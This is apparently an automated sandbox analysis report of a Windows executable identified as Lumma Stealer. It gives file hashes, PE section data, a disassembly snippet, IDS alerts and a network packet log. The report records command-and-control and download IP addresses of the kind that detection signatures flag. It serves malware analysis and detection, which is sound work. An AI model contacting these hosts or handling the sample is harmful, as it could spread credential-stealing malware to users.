                                                                                                                                                                                              Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):19696
                                                                                                                                                                                              Entropy (8bit):7.9898910353479335
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                              MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                              SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                              SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                              SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                              Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):33148
                                                                                                                                                                                              Entropy (8bit):4.917595394577667
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                              MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                              SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                              SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                              SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                              Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):35005
                                                                                                                                                                                              Entropy (8bit):7.980061050467981
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                              MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                              SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                              SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                              SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Entropy (8bit):7.948278693834597
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                              File size:1'860'096 bytes
                                                                                                                                                                                              MD5:1eb940602d253a449c44e9ecfd4714c4
                                                                                                                                                                                              SHA1:ff6f23e46ef9135291f99e07d163c6962e8534ce
                                                                                                                                                                                              SHA256:da9b745fe87edb958afce58dd53a2ad33db48635b72d43de75b5dd378d07b75e
                                                                                                                                                                                              SHA512:5c0a577ca941930d0910d34bc7d079b8b155c2d52ff50df0db26cb4153f391306781c28b1a42b58d09adbc4365fadb9519cd47d8468dd6534364424d54af9827
                                                                                                                                                                                              SSDEEP:49152:ujpck71qgS6qKy162AArH9nGjHOZeoVm2:u6fggKc/9xLF
                                                                                                                                                                                              TLSH:948533BF3E81717EE0AD40FE824761933231EE0D59809961343558EE35AB8B5A5CFA7C
                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g............................. J...........@..........................PJ...........@.................................\...p..
                                                                                                                                                                                              Icon Hash:00928e8e8686b000
                                                                                                                                                                                              Entrypoint:0x8a2000
                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                              Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                              Instruction
                                                                                                                                                                                              jmp 00007F80AC7EDEFAh
                                                                                                                                                                                              cmovo ebx, dword ptr [eax+eax]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              jmp 00007F80AC7EFEF5h
                                                                                                                                                                                              add byte ptr [edx+ecx], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              and al, byte ptr [eax]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              or ecx, dword ptr [edx]
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              0x10000x560000x2620052df7de6a2bfb67d138f74bd25a5e66eFalse0.9993148053278689data7.97443476819522IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .rsrc0x570000x2b00x200fff1a89bf51ab9451d056d11b7af1ef3False0.798828125data6.062499121949938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              0x590000x2ab0000x2006d2a4b4399f41497c9c97dffe0e0d6d1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              ygcbzohu0x3040000x19d0000x19c200c446f33acd484ee0fa9309fbe83f0e66False0.9946352744919624data7.953752772757039IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              dmyrahus0x4a10000x10000x60046481efa392ab7bb61a615bb2004c063False0.5423177083333334data4.919394286237468IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .taggant0x4a20000x30000x22005d12bcfbcbb8a2c3feb712614b6db126False0.061236213235294115DOS executable (COM)0.7877203755825597IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                              RT_MANIFEST0x49fdcc0x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2024-11-24T13:39:04.061398+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:05.319419+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:05.319419+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:06.805445+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:07.533117+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649709104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:07.533117+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:09.374968+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:12.058941+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:14.539818+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:16.991686+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:17.691341+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649724104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:19.558511+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649733104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:24.502043+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649746104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:25.257069+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649746104.21.33.116443TCP
                                                                                                                                                                                              2024-11-24T13:39:26.918577+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.649752185.215.113.1680TCP
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Nov 24, 2024 13:38:55.195873976 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:55.197552919 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:38:55.197602034 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:38:55.197709084 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:38:55.317086935 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:55.317128897 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:55.317190886 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:55.756814957 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:55.808089972 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:38:55.969532013 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:55.970542908 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:38:56.090223074 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:56.530107975 CET4434970620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:38:56.573764086 CET49706443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:38:56.683163881 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:38:56.683166981 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:38:57.011373043 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:02.766556978 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:02.766593933 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:02.766696930 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:02.778601885 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:02.778620005 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:04.061305046 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:04.061398029 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:04.064811945 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:04.064834118 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:04.065166950 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:04.104984999 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:04.121359110 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:04.121397018 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:04.121524096 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:04.813186884 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:04.813222885 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:04.813292980 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:04.814090014 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:04.814100981 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:05.319403887 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:05.319506884 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:05.319565058 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:05.326479912 CET49707443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:05.326510906 CET44349707104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:05.480662107 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:05.480729103 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:05.480794907 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:05.481271029 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:05.481287003 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:06.292531967 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:06.292536974 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:06.620632887 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                              Nov 24, 2024 13:39:06.805362940 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:06.805444956 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:06.806746006 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:06.806752920 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:06.807075977 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:06.810715914 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:06.810751915 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:06.810796022 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.097903967 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.098022938 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.101574898 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.101598978 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.101825953 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.103487015 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.103601933 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.103614092 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.103662014 CET49708443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:39:07.147372007 CET4434970820.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.533027887 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.533081055 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.533123016 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.533130884 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.533143997 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.533210039 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.533215046 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.544920921 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.544955015 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.544986963 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.544992924 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.545052052 CET49709443192.168.2.6104.21.33.116
                                                                                                                                                                                              Nov 24, 2024 13:39:07.557025909 CET44349709104.21.33.116192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:07.569300890 CET44349709104.21.33.116192.168.2.6
